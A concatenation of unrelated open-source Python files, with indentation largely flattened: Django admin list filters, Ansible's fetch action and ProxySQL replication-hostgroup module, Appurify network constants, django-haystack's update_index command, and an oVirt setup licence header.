}
for pk_val, val in self.lookup_choices:
yield {
'selected': self.lookup_val == smart_text(pk_val),
'query_string': cl.get_query_string({
self.lookup_kwarg: pk_val,
}, [self.lookup_kwarg_isnull]),
'display': val,
}
if (isinstance(self.field, models.related.RelatedObject) and
self.field.field.null or hasattr(self.field, 'rel') and
self.field.null):
yield {
'selected': bool(self.lookup_val_isnull),
'query_string': cl.get_query_string({
self.lookup_kwarg_isnull: 'True',
}, [self.lookup_kwarg]),
'display': EMPTY_CHANGELIST_VALUE,
}
FieldListFilter.register(lambda f: (
bool(f.rel) if hasattr(f, 'rel') else
isinstance(f, models.related.RelatedObject)), RelatedFieldListFilter)
class BooleanFieldListFilter(FieldListFilter):
def __init__(self, field, request, params, model, model_admin, field_path):
self.lookup_kwarg = '%s__exact' % field_path
self.lookup_kwarg2 = '%s__isnull' % field_path
self.lookup_val = request.GET.get(self.lookup_kwarg, None)
self.lookup_val2 = request.GET.get(self.lookup_kwarg2, None)
super(BooleanFieldListFilter, self).__init__(field,
request, params, model, model_admin, field_path)
def expected_parameters(self):
return [self.lookup_kwarg, self.lookup_kwarg2]
def choices(self, cl):
for lookup, title in (
(None, _('All')),
('1', _('Yes')),
('0', _('No'))):
yield {
'selected': self.lookup_val == lookup and not self.lookup_val2,
'query_string': cl.get_query_string({
self.lookup_kwarg: lookup,
}, [self.lookup_kwarg2]),
'display': title,
}
if isinstance(self.field, models.NullBooleanField):
yield {
'selected': self.lookup_val2 == 'True',
'query_string': cl.get_query_string({
self.lookup_kwarg2: 'True',
}, [self.lookup_kwarg]),
'display': _('Unknown'),
}
FieldListFilter.register(lambda f: isinstance(f,
(models.BooleanField, models.NullBooleanField)), BooleanFieldListFilter)
class ChoicesFieldListFilter(FieldListFilter):
def __init__(self, field, request, params, model, model_admin, field_path):
self.lookup_kwarg = '%s__exact' % field_path
self.lookup_val = request.GET.get(self.lookup_kwarg)
super(ChoicesFieldListFilter, self).__init__(
field, request, params, model, model_admin, field_path)
def expected_parameters(self):
return [self.lookup_kwarg]
def choices(self, cl):
yield {
'selected': self.lookup_val is None,
'query_string': cl.get_query_string({}, [self.lookup_kwarg]),
'display': _('All')
}
for lookup, title in self.field.flatchoices:
yield {
'selected': smart_text(lookup) == self.lookup_val,
'query_string': cl.get_query_string({
self.lookup_kwarg: lookup}),
'display': title,
}
FieldListFilter.register(lambda f: bool(f.choices), ChoicesFieldListFilter)
class DateFieldListFilter(FieldListFilter):
def __init__(self, field, request, params, model, model_admin, field_path):
self.field_generic = '%s__' % field_path
self.date_params = dict((k, v) for k, v in params.items()
if k.startswith(self.field_generic))
now = timezone.now()
# When time zone support is enabled, convert "now" to the user's time
# zone so Django's definition of "Today" matches what the user expects.
if timezone.is_aware(now):
now = timezone.localtime(now)
if isinstance(field, models.DateTimeField):
today = now.replace(hour=0, minute=0, second=0, microsecond=0)
else: # field is a models.DateField
today = now.date()
tomorrow = today + datetime.timedelta(days=1)
if today.month == 12:
next_month = today.replace(year=today.year + 1, month=1, day=1)
else:
next_month = today.replace(month=today.month + 1, day=1)
next_year = today.replace(year=today.year + 1, month=1, day=1)
self.lookup_kwarg_since = '%s__gte' % field_path
self.lookup_kwarg_until = '%s__lt' % field_path
self.links = (
(_('Any date'), {}),
(_('Today'), {
self.lookup_kwarg_since: str(today),
self.lookup_kwarg_until: str(tomorrow),
}),
(_('Past 7 days'), {
self.lookup_kwarg_since: str(today - datetime.timedelta(days=7)),
self.lookup_kwarg_until: str(tomorrow),
}),
(_('This month'), {
self.lookup_kwarg_since: str(today.replace(day=1)),
self.lookup_kwarg_until: str(next_month),
}),
(_('This year'), {
self.lookup_kwarg_since: str(today.replace(month=1, day=1)),
self.lookup_kwarg_until: str(next_year),
}),
)
super(DateFieldListFilter, self).__init__(
field, request, params, model, model_admin, field_path)
def expected_parameters(self):
return [self.lookup_kwarg_since, self.lookup_kwarg_until]
def choices(self, cl):
for title, param_dict in self.links:
yield {
'selected': self.date_params == param_dict,
'query_string': cl.get_query_string(
param_dict, [self.field_generic]),
'display': title,
}
FieldListFilter.register(
lambda f: isinstance(f, models.DateField), DateFieldListFilter)
# This should be registered last, because it's a last resort. For example,
# if a field is eligible to use the BooleanFieldListFilter, that'd be much
# more appropriate, and the AllValuesFieldListFilter won't get used for it.
class AllValuesFieldListFilter(FieldListFilter):
def __init__(self, field, request, params, model, model_admin, field_path):
self.lookup_kwarg = field_path
self.lookup_kwarg_isnull = '%s__isnull' % field_path
self.lookup_val = request.GET.get(self.lookup_kwarg, None)
self.lookup_val_isnull = request.GET.get(self.lookup_kwarg_isnull,
None)
parent_model, reverse_path = reverse_field_path(model, field_path)
queryset = parent_model._default_manager.all()
        # optional feature: limit choices based on existing relationships
# queryset = queryset.complex_filter(
# {'%s__isnull' % reverse_path: False})
limit_choices_to = get_limit_choices_to_from_path(model, field_path)
queryset = queryset.filter(limit_choices_to)
self.lookup_choices = (queryset
.distinct()
.order_by(field.name)
.values_list(field.name, flat=True))
super(AllValuesFieldListFilter, self).__init__(
field, request, params, model, model_admin, field_path)
def expected_parameters(self):
return [self.lookup_kwarg, self.lookup_kwarg_isnull]
def choices(self, cl):
from django.contrib.admin.views.main import EMPTY_CHANGELIST_VALUE
yield {
'selected': (self.lookup_val is None
and self.lookup_val_isnull is None),
'query_string': cl.get_query_string({},
[self.lookup_kwarg, self.lookup_kwarg_isnull]),
'display': _('All'),
}
include_none = False
for val in self.lookup_choices:
if val is None:
include_none = True
continue
val = smart_text(val)
yield {
'selected': self.lookup_val == val,
'query_string': cl.get_query_string({
self.lookup_kwarg: val,
}, [self.lookup_kwarg_isnull]),
'display': val,
}
if include_none:
yield {
'selected': bool(self.lookup_val_isnull),
'query_string': cl.get_query_string({
self.lookup_kwarg_isnull: 'True',
}, [self.lookup_kwarg]),
'display': EMPTY_CHANGELIST_VALUE,
}
FieldListFilter.register(lambda f: True, AllValuesFieldListFilter)
| mit |
bwbeach/ansible | lib/ansible/plugins/action/fetch.py | 18 | 7436 | # (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import pwd
import random
import traceback
import tempfile
import base64
from ansible import constants as C
from ansible.errors import *
from ansible.plugins.action import ActionBase
from ansible.utils.boolean import boolean
from ansible.utils.hashing import checksum, checksum_s, md5, secure_hash
from ansible.utils.path import makedirs_safe
class ActionModule(ActionBase):
def run(self, tmp=None, task_vars=dict()):
''' handler for fetch operations '''
if self._play_context.check_mode:
return dict(skipped=True, msg='check mode not (yet) supported for this module')
source = self._task.args.get('src', None)
dest = self._task.args.get('dest', None)
flat = boolean(self._task.args.get('flat'))
fail_on_missing = boolean(self._task.args.get('fail_on_missing'))
validate_checksum = boolean(self._task.args.get('validate_checksum', self._task.args.get('validate_md5')))
if 'validate_md5' in self._task.args and 'validate_checksum' in self._task.args:
return dict(failed=True, msg="validate_checksum and validate_md5 cannot both be specified")
if source is None or dest is None:
return dict(failed=True, msg="src and dest are required")
source = self._connection._shell.join_path(source)
source = self._remote_expand_user(source, tmp)
# calculate checksum for the remote file
remote_checksum = self._remote_checksum(tmp, source, all_vars=task_vars)
# use slurp if sudo and permissions are lacking
remote_data = None
if remote_checksum in ('1', '2') or self._play_context.become:
slurpres = self._execute_module(module_name='slurp', module_args=dict(src=source), task_vars=task_vars, tmp=tmp)
if slurpres.get('rc') == 0:
if slurpres['encoding'] == 'base64':
remote_data = base64.b64decode(slurpres['content'])
if remote_data is not None:
remote_checksum = checksum_s(remote_data)
# the source path may have been expanded on the
# target system, so we compare it here and use the
# expanded version if it's different
remote_source = slurpres.get('source')
if remote_source and remote_source != source:
source = remote_source
else:
# FIXME: should raise an error here? the old code did nothing
pass
# calculate the destination name
if os.path.sep not in self._connection._shell.join_path('a', ''):
source = self._connection._shell._unquote(source)
source_local = source.replace('\\', '/')
else:
source_local = source
dest = os.path.expanduser(dest)
if flat:
if dest.endswith(os.sep):
# if the path ends with "/", we'll use the source filename as the
# destination filename
base = os.path.basename(source_local)
dest = os.path.join(dest, base)
if not dest.startswith("/"):
# if dest does not start with "/", we'll assume a relative path
dest = self._loader.path_dwim(dest)
else:
# files are saved in dest dir, with a subdir for each host, then the filename
if 'inventory_hostname' in task_vars:
target_name = task_vars['inventory_hostname']
else:
target_name = self._play_context.remote_addr
dest = "%s/%s/%s" % (self._loader.path_dwim(dest), target_name, source_local)
dest = dest.replace("//","/")
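        # remote_checksum sentinel values (see the branches below): '0' checksum
        # could not be calculated, '1' file missing, '2' unreadable, '3' is a
        # directory, '4' no python on the remote host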
if remote_checksum in ('0', '1', '2', '3', '4'):
            # these don't fail because you may want to transfer a log file that
            # may or may not exist, while continuing to fetch other log files
if remote_checksum == '0':
result = dict(msg="unable to calculate the checksum of the remote file", file=source, changed=False)
elif remote_checksum == '1':
if fail_on_missing:
result = dict(failed=True, msg="the remote file does not exist", file=source)
else:
result = dict(msg="the remote file does not exist, not transferring, ignored", file=source, changed=False)
elif remote_checksum == '2':
result = dict(msg="no read permission on remote file, not transferring, ignored", file=source, changed=False)
elif remote_checksum == '3':
result = dict(msg="remote file is a directory, fetch cannot work on directories", file=source, changed=False)
elif remote_checksum == '4':
result = dict(msg="python isn't present on the system. Unable to compute checksum", file=source, changed=False)
return result
# calculate checksum for the local file
local_checksum = checksum(dest)
if remote_checksum != local_checksum:
# create the containing directories, if needed
makedirs_safe(os.path.dirname(dest))
# fetch the file and check for changes
if remote_data is None:
self._connection.fetch_file(source, dest)
else:
try:
f = open(dest, 'w')
f.write(remote_data)
f.close()
except (IOError, OSError) as e:
raise AnsibleError("Failed to fetch the file: %s" % e)
new_checksum = secure_hash(dest)
# For backwards compatibility. We'll return None on FIPS enabled
# systems
try:
new_md5 = md5(dest)
except ValueError:
new_md5 = None
if validate_checksum and new_checksum != remote_checksum:
return dict(failed=True, md5sum=new_md5, msg="checksum mismatch", file=source, dest=dest, remote_md5sum=None, checksum=new_checksum, remote_checksum=remote_checksum)
return dict(changed=True, md5sum=new_md5, dest=dest, remote_md5sum=None, checksum=new_checksum, remote_checksum=remote_checksum)
else:
# For backwards compatibility. We'll return None on FIPS enabled
# systems
try:
local_md5 = md5(dest)
except ValueError:
local_md5 = None
return dict(changed=False, md5sum=local_md5, file=source, dest=dest, checksum=local_checksum)
| gpl-3.0 |
axinging/sky_engine | build/android/pylib/remote/device/appurify_constants.py | 36 | 1614 | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Defines a set of constants specific to appurify."""
# Appurify network config constants.
class NETWORK(object):
WIFI_1_BAR = 1
SPRINT_4G_LTE_4_BARS = 2
SPRINT_3G_5_BARS = 3
SPRINT_3G_4_BARS = 4
SPRINT_3G_3_BARS = 5
SPRINT_3G_2_BARS = 6
SPRINT_3G_1_BAR = 7
  SPRINT_4G_1_BAR = 8
VERIZON_3G_5_BARS = 9
VERIZON_3G_4_BARS = 10
VERIZON_3G_3_BARS = 11
VERIZON_3G_2_BARS = 12
VERIZON_3G_1_BAR = 13
VERIZON_4G_1_BAR = 14
ATANDT_3G_5_BARS = 15
ATANDT_3G_4_BARS = 16
ATANDT_3G_3_BARS = 17
ATANDT_3G_2_BARS = 18
ATANDT_3G_1_BAR = 19
GENERIC_2G_4_BARS = 20
GENERIC_2G_3_BARS = 21
GENERIC_EVOLVED_EDGE = 22
GENERIC_GPRS = 23
GENERIC_ENHANCED_GPRS = 24
GENERIC_LTE = 25
GENERIC_HIGH_LATENCY_DNS = 26
GENERIC_100_PERCENT_PACKET_LOSS = 27
ATANDT_HSPA_PLUS = 28
ATANDT_4G_LTE_4_BARS = 29
VERIZON_4G_LTE_4_BARS = 30
GENERIC_DIGITAL_SUBSCRIBE_LINE = 31
WIFI_STARBUCKS_3_BARS = 32
WIFI_STARBUCKS_4_BARS = 33
WIFI_STARBUCKS_HIGH_TRAFFIC = 34
WIFI_TARGET_1_BAR = 35
WIFI_TARGET_3_BARS = 36
WIFI_TARGET_4_BARS = 37
PUBLIC_WIFI_MCDONALDS_5_BARS = 38
PUBLIC_WIFI_MCDONALDS_4_BARS = 39
PUBLIC_WIFI_MCDONALDS_2_BARS = 40
PUBLIC_WIFI_MCDONALDS_1_BAR = 41
PUBLIC_WIFI_KOHLS_5_BARS = 42
PUBLIC_WIFI_KOHLS_4_BARS = 43
PUBLIC_WIFI_KOHLS_2_BARS = 44
PUBLIC_WIFI_ATANDT_5_BARS = 45
PUBLIC_WIFI_ATANDT_4_BARS = 46
PUBLIC_WIFI_ATANDT_2_BARS = 47
PUBLIC_WIFI_ATANDT_1_BAR = 48
BOINGO = 49 | bsd-3-clause |
t794104/ansible | lib/ansible/modules/database/proxysql/proxysql_replication_hostgroups.py | 52 | 13353 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = '''
---
module: proxysql_replication_hostgroups
version_added: "2.3"
author: "Ben Mildren (@bmildren)"
short_description: Manages replication hostgroups using the proxysql admin
interface.
description:
    - Each row in mysql_replication_hostgroups represents a pair of
writer_hostgroup and reader_hostgroup. ProxySQL will monitor the value of
read_only for all the servers in specified hostgroups, and based on the
value of read_only will assign the server to the writer or reader
hostgroups.
options:
writer_hostgroup:
description:
- Id of the writer hostgroup.
required: True
reader_hostgroup:
description:
- Id of the reader hostgroup.
required: True
comment:
description:
      - Text field that can be used for any purpose defined by the user.
state:
description:
- When C(present) - adds the replication hostgroup, when C(absent) -
removes the replication hostgroup.
choices: [ "present", "absent" ]
default: present
extends_documentation_fragment:
- proxysql.managing_config
- proxysql.connectivity
'''
EXAMPLES = '''
---
# This example adds a replication hostgroup, it saves the mysql server config
# to disk, but avoids loading the mysql server config to runtime (this might be
# because several replication hostgroups are being added and the user wants to
# push the config to runtime in a single batch using the
# M(proxysql_manage_config) module). It uses supplied credentials to connect
# to the proxysql admin interface.
- proxysql_replication_hostgroups:
login_user: 'admin'
login_password: 'admin'
writer_hostgroup: 1
reader_hostgroup: 2
state: present
load_to_runtime: False
# This example removes a replication hostgroup, saves the mysql server config
# to disk, and dynamically loads the mysql server config to runtime. It uses
# credentials in a supplied config file to connect to the proxysql admin
# interface.
- proxysql_replication_hostgroups:
config_file: '~/proxysql.cnf'
writer_hostgroup: 3
reader_hostgroup: 4
state: absent
'''
RETURN = '''
stdout:
description: The replication hostgroup modified or removed from proxysql
returned: On create/update will return the newly modified group, on delete
it will return the deleted record.
type: dict
"sample": {
"changed": true,
"msg": "Added server to mysql_hosts",
"repl_group": {
"comment": "",
"reader_hostgroup": "1",
"writer_hostgroup": "2"
},
"state": "present"
}
'''
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.mysql import mysql_connect, mysql_driver, mysql_driver_fail_msg
from ansible.module_utils._text import to_native
# ===========================================
# proxysql module specific support methods.
#
def perform_checks(module):
if module.params["login_port"] < 0 \
or module.params["login_port"] > 65535:
module.fail_json(
msg="login_port must be a valid unix port number (0-65535)"
)
if not module.params["writer_hostgroup"] >= 0:
module.fail_json(
msg="writer_hostgroup must be a integer greater than or equal to 0"
)
if not module.params["reader_hostgroup"] == \
module.params["writer_hostgroup"]:
if not module.params["reader_hostgroup"] > 0:
module.fail_json(
msg=("writer_hostgroup must be a integer greater than" +
" or equal to 0")
)
else:
module.fail_json(
msg="reader_hostgroup cannot equal writer_hostgroup"
)
if mysql_driver is None:
module.fail_json(msg=mysql_driver_fail_msg)
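# ProxySQL keeps its configuration in three layers (in-memory, runtime and
# disk); the two helpers below persist the in-memory mysql servers config to
# disk and push it to the runtime layer respectively.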
def save_config_to_disk(cursor):
cursor.execute("SAVE MYSQL SERVERS TO DISK")
return True
def load_config_to_runtime(cursor):
cursor.execute("LOAD MYSQL SERVERS TO RUNTIME")
return True
class ProxySQLReplicationHostgroup(object):
def __init__(self, module):
self.state = module.params["state"]
self.save_to_disk = module.params["save_to_disk"]
self.load_to_runtime = module.params["load_to_runtime"]
self.writer_hostgroup = module.params["writer_hostgroup"]
self.reader_hostgroup = module.params["reader_hostgroup"]
self.comment = module.params["comment"]
def check_repl_group_config(self, cursor, keys):
query_string = \
"""SELECT count(*) AS `repl_groups`
FROM mysql_replication_hostgroups
WHERE writer_hostgroup = %s
AND reader_hostgroup = %s"""
query_data = \
[self.writer_hostgroup,
self.reader_hostgroup]
if self.comment and not keys:
query_string += "\n AND comment = %s"
query_data.append(self.comment)
cursor.execute(query_string, query_data)
check_count = cursor.fetchone()
return (int(check_count['repl_groups']) > 0)
def get_repl_group_config(self, cursor):
query_string = \
"""SELECT *
FROM mysql_replication_hostgroups
WHERE writer_hostgroup = %s
AND reader_hostgroup = %s"""
query_data = \
[self.writer_hostgroup,
self.reader_hostgroup]
cursor.execute(query_string, query_data)
repl_group = cursor.fetchone()
return repl_group
def create_repl_group_config(self, cursor):
query_string = \
"""INSERT INTO mysql_replication_hostgroups (
writer_hostgroup,
reader_hostgroup,
comment)
VALUES (%s, %s, %s)"""
query_data = \
[self.writer_hostgroup,
self.reader_hostgroup,
self.comment or '']
cursor.execute(query_string, query_data)
return True
def update_repl_group_config(self, cursor):
query_string = \
"""UPDATE mysql_replication_hostgroups
SET comment = %s
WHERE writer_hostgroup = %s
AND reader_hostgroup = %s"""
query_data = \
[self.comment,
self.writer_hostgroup,
self.reader_hostgroup]
cursor.execute(query_string, query_data)
return True
def delete_repl_group_config(self, cursor):
query_string = \
"""DELETE FROM mysql_replication_hostgroups
WHERE writer_hostgroup = %s
AND reader_hostgroup = %s"""
query_data = \
[self.writer_hostgroup,
self.reader_hostgroup]
cursor.execute(query_string, query_data)
return True
def manage_config(self, cursor, state):
if state:
if self.save_to_disk:
save_config_to_disk(cursor)
if self.load_to_runtime:
load_config_to_runtime(cursor)
def create_repl_group(self, check_mode, result, cursor):
if not check_mode:
result['changed'] = \
self.create_repl_group_config(cursor)
result['msg'] = "Added server to mysql_hosts"
result['repl_group'] = \
self.get_repl_group_config(cursor)
self.manage_config(cursor,
result['changed'])
else:
result['changed'] = True
result['msg'] = ("Repl group would have been added to" +
" mysql_replication_hostgroups, however" +
" check_mode is enabled.")
def update_repl_group(self, check_mode, result, cursor):
if not check_mode:
result['changed'] = \
self.update_repl_group_config(cursor)
result['msg'] = "Updated server in mysql_hosts"
result['repl_group'] = \
self.get_repl_group_config(cursor)
self.manage_config(cursor,
result['changed'])
else:
result['changed'] = True
result['msg'] = ("Repl group would have been updated in" +
" mysql_replication_hostgroups, however" +
" check_mode is enabled.")
def delete_repl_group(self, check_mode, result, cursor):
if not check_mode:
result['repl_group'] = \
self.get_repl_group_config(cursor)
result['changed'] = \
self.delete_repl_group_config(cursor)
result['msg'] = "Deleted server from mysql_hosts"
self.manage_config(cursor,
result['changed'])
else:
result['changed'] = True
result['msg'] = ("Repl group would have been deleted from" +
" mysql_replication_hostgroups, however" +
" check_mode is enabled.")
# ===========================================
# Module execution.
#
def main():
module = AnsibleModule(
argument_spec=dict(
login_user=dict(default=None, type='str'),
login_password=dict(default=None, no_log=True, type='str'),
login_host=dict(default="127.0.0.1"),
login_unix_socket=dict(default=None),
login_port=dict(default=6032, type='int'),
config_file=dict(default="", type='path'),
writer_hostgroup=dict(required=True, type='int'),
reader_hostgroup=dict(required=True, type='int'),
comment=dict(type='str'),
state=dict(default='present', choices=['present',
'absent']),
save_to_disk=dict(default=True, type='bool'),
load_to_runtime=dict(default=True, type='bool')
),
supports_check_mode=True
)
perform_checks(module)
login_user = module.params["login_user"]
login_password = module.params["login_password"]
config_file = module.params["config_file"]
cursor = None
try:
cursor = mysql_connect(module,
login_user,
login_password,
config_file,
cursor_class=mysql_driver.cursors.DictCursor)
except mysql_driver.Error as e:
module.fail_json(
msg="unable to connect to ProxySQL Admin Module.. %s" % to_native(e)
)
proxysql_repl_group = ProxySQLReplicationHostgroup(module)
result = {}
result['state'] = proxysql_repl_group.state
if proxysql_repl_group.state == "present":
try:
if not proxysql_repl_group.check_repl_group_config(cursor,
keys=True):
proxysql_repl_group.create_repl_group(module.check_mode,
result,
cursor)
else:
if not proxysql_repl_group.check_repl_group_config(cursor,
keys=False):
proxysql_repl_group.update_repl_group(module.check_mode,
result,
cursor)
else:
result['changed'] = False
result['msg'] = ("The repl group already exists in" +
" mysql_replication_hostgroups and" +
" doesn't need to be updated.")
result['repl_group'] = \
proxysql_repl_group.get_repl_group_config(cursor)
except mysql_driver.Error as e:
module.fail_json(
msg="unable to modify replication hostgroup.. %s" % to_native(e)
)
elif proxysql_repl_group.state == "absent":
try:
if proxysql_repl_group.check_repl_group_config(cursor,
keys=True):
proxysql_repl_group.delete_repl_group(module.check_mode,
result,
cursor)
else:
result['changed'] = False
result['msg'] = ("The repl group is already absent from the" +
" mysql_replication_hostgroups memory" +
" configuration")
except mysql_driver.Error as e:
module.fail_json(
msg="unable to delete replication hostgroup.. %s" % to_native(e)
)
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
jannon/django-haystack | haystack/management/commands/update_index.py | 11 | 11888 | # encoding: utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import os
import sys
import warnings
from datetime import timedelta
from optparse import make_option
try:
from django.db import close_old_connections
except ImportError:
# This can be removed when we drop support for Django 1.7 and earlier:
from django.db import close_connection as close_old_connections
from django.core.management.base import LabelCommand
from django.db import reset_queries
from haystack import connections as haystack_connections
from haystack.query import SearchQuerySet
from haystack.utils.app_loading import haystack_get_models, haystack_load_apps
try:
from django.utils.encoding import force_text
except ImportError:
from django.utils.encoding import force_unicode as force_text
try:
from django.utils.encoding import smart_bytes
except ImportError:
from django.utils.encoding import smart_str as smart_bytes
try:
from django.utils.timezone import now
except ImportError:
from datetime import datetime
now = datetime.now
DEFAULT_BATCH_SIZE = None
DEFAULT_AGE = None
APP = 'app'
MODEL = 'model'
def worker(bits):
# We need to reset the connections, otherwise the different processes
# will try to share the connection, which causes things to blow up.
from django.db import connections
for alias, info in connections.databases.items():
# We need to also tread lightly with SQLite, because blindly wiping
# out connections (via ``... = {}``) destroys in-memory DBs.
if 'sqlite3' not in info['ENGINE']:
try:
close_old_connections()
if isinstance(connections._connections, dict):
del(connections._connections[alias])
else:
delattr(connections._connections, alias)
except KeyError:
pass
if bits[0] == 'do_update':
func, model, start, end, total, using, start_date, end_date, verbosity, commit = bits
elif bits[0] == 'do_remove':
func, model, pks_seen, start, upper_bound, using, verbosity, commit = bits
else:
return
unified_index = haystack_connections[using].get_unified_index()
index = unified_index.get_index(model)
backend = haystack_connections[using].get_backend()
if func == 'do_update':
qs = index.build_queryset(start_date=start_date, end_date=end_date)
do_update(backend, index, qs, start, end, total, verbosity=verbosity, commit=commit)
else:
raise NotImplementedError('Unknown function %s' % func)
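# Each work-queue entry handed to worker() is a plain tuple; for updates it
# looks like (a sketch mirroring the append in update_backend below):
#   ('do_update', Model, start, end, total, using, start_date, end_date,
#    verbosity, commit)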
def do_update(backend, index, qs, start, end, total, verbosity=1, commit=True):
# Get a clone of the QuerySet so that the cache doesn't bloat up
# in memory. Useful when reindexing large amounts of data.
small_cache_qs = qs.all()
current_qs = small_cache_qs[start:end]
if verbosity >= 2:
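        # intended to distinguish output printed by the parent process (plain
        # line) from output printed by multiprocessing workers (tagged pid)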
if hasattr(os, 'getppid') and os.getpid() == os.getppid():
print(" indexed %s - %d of %d." % (start + 1, end, total))
else:
print(" indexed %s - %d of %d (by %s)." % (start + 1, end, total, os.getpid()))
# FIXME: Get the right backend.
backend.update(index, current_qs, commit=commit)
# Clear out the DB connections queries because it bloats up RAM.
reset_queries()
class Command(LabelCommand):
help = "Freshens the index for the given app(s)."
base_options = (
make_option('-a', '--age', action='store', dest='age',
default=DEFAULT_AGE, type='int',
help='Number of hours back to consider objects new.'
),
make_option('-s', '--start', action='store', dest='start_date',
default=None, type='string',
help='The start date for indexing within. Can be any dateutil-parsable string, recommended to be YYYY-MM-DDTHH:MM:SS.'
),
make_option('-e', '--end', action='store', dest='end_date',
default=None, type='string',
help='The end date for indexing within. Can be any dateutil-parsable string, recommended to be YYYY-MM-DDTHH:MM:SS.'
),
make_option('-b', '--batch-size', action='store', dest='batchsize',
default=None, type='int',
help='Number of items to index at once.'
),
make_option('-r', '--remove', action='store_true', dest='remove',
default=False, help='Remove objects from the index that are no longer present in the database.'
),
make_option("-u", "--using", action="append", dest="using",
default=[],
help='Update only the named backend (can be used multiple times). '
'By default all backends will be updated.'
),
make_option('-k', '--workers', action='store', dest='workers',
default=0, type='int',
                    help='Allows for the use of multiple workers to parallelize indexing. Requires multiprocessing.'
),
make_option('--nocommit', action='store_false', dest='commit',
default=True, help='Will pass commit=False to the backend.'
),
)
option_list = LabelCommand.option_list + base_options
def handle(self, *items, **options):
self.verbosity = int(options.get('verbosity', 1))
self.batchsize = options.get('batchsize', DEFAULT_BATCH_SIZE)
self.start_date = None
self.end_date = None
self.remove = options.get('remove', False)
self.workers = int(options.get('workers', 0))
self.commit = options.get('commit', True)
if sys.version_info < (2, 7):
warnings.warn('multiprocessing is disabled on Python 2.6 and earlier. '
'See https://github.com/toastdriven/django-haystack/issues/1001')
self.workers = 0
self.backends = options.get('using')
if not self.backends:
self.backends = haystack_connections.connections_info.keys()
age = options.get('age', DEFAULT_AGE)
start_date = options.get('start_date')
end_date = options.get('end_date')
if age is not None:
self.start_date = now() - timedelta(hours=int(age))
if start_date is not None:
from dateutil.parser import parse as dateutil_parse
try:
self.start_date = dateutil_parse(start_date)
except ValueError:
pass
if end_date is not None:
from dateutil.parser import parse as dateutil_parse
try:
self.end_date = dateutil_parse(end_date)
except ValueError:
pass
if not items:
items = haystack_load_apps()
return super(Command, self).handle(*items, **options)
def handle_label(self, label, **options):
for using in self.backends:
try:
self.update_backend(label, using)
except:
logging.exception("Error updating %s using %s ", label, using)
raise
def update_backend(self, label, using):
from haystack.exceptions import NotHandled
backend = haystack_connections[using].get_backend()
unified_index = haystack_connections[using].get_unified_index()
if self.workers > 0:
import multiprocessing
for model in haystack_get_models(label):
try:
index = unified_index.get_index(model)
except NotHandled:
if self.verbosity >= 2:
print("Skipping '%s' - no index." % model)
continue
if self.workers > 0:
                # Workers will reset the database connections, which can leave
                # model/connection references in this process stale or
                # disconnected out from under them. Resetting here, before the
                # loop touches the ORM again, avoids that.
close_old_connections()
qs = index.build_queryset(using=using, start_date=self.start_date,
end_date=self.end_date)
total = qs.count()
if self.verbosity >= 1:
print(u"Indexing %d %s" % (total, force_text(model._meta.verbose_name_plural)))
batch_size = self.batchsize or backend.batch_size
if self.workers > 0:
ghetto_queue = []
for start in range(0, total, batch_size):
end = min(start + batch_size, total)
if self.workers == 0:
do_update(backend, index, qs, start, end, total, verbosity=self.verbosity, commit=self.commit)
else:
ghetto_queue.append(('do_update', model, start, end, total, using, self.start_date, self.end_date, self.verbosity, self.commit))
if self.workers > 0:
pool = multiprocessing.Pool(self.workers)
pool.map(worker, ghetto_queue)
pool.close()
pool.join()
if self.remove:
if self.start_date or self.end_date or total <= 0:
# They're using a reduced set, which may not incorporate
# all pks. Rebuild the list with everything.
qs = index.index_queryset().values_list('pk', flat=True)
database_pks = set(smart_bytes(pk) for pk in qs)
total = len(database_pks)
else:
database_pks = set(smart_bytes(pk) for pk in qs.values_list('pk', flat=True))
# Since records may still be in the search index but not the local database
# we'll use that to create batches for processing.
# See https://github.com/django-haystack/django-haystack/issues/1186
index_total = SearchQuerySet(using=backend.connection_alias).models(model).count()
# Retrieve PKs from the index. Note that this cannot be a numeric range query because although
# pks are normally numeric they can be non-numeric UUIDs or other custom values. To reduce
# load on the search engine, we only retrieve the pk field, which will be checked against the
# full list obtained from the database, and the id field, which will be used to delete the
# record should it be found to be stale.
index_pks = SearchQuerySet(using=backend.connection_alias).models(model)
index_pks = index_pks.values_list('pk', 'id')
# We'll collect all of the record IDs which are no longer present in the database and delete
# them after walking the entire index. This uses more memory than the incremental approach but
# avoids needing the pagination logic below to account for both commit modes:
stale_records = set()
for start in range(0, index_total, batch_size):
upper_bound = start + batch_size
# If the database pk is no longer present, queue the index key for removal:
for pk, rec_id in index_pks[start:upper_bound]:
if smart_bytes(pk) not in database_pks:
stale_records.add(rec_id)
if stale_records:
if self.verbosity >= 1:
print(" removing %d stale records." % len(stale_records))
for rec_id in stale_records:
# Since the PK was not in the database list, we'll delete the record from the search index:
if self.verbosity >= 2:
print(" removing %s." % rec_id)
backend.remove(rec_id, commit=self.commit)
| bsd-3-clause |
jtux270/translate | ovirt/packaging/setup/plugins/ovirt-engine-common/base/core/offlinepackager.py | 3 | 2433 | #
# ovirt-engine-setup -- ovirt engine setup
# Copyright (C) 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
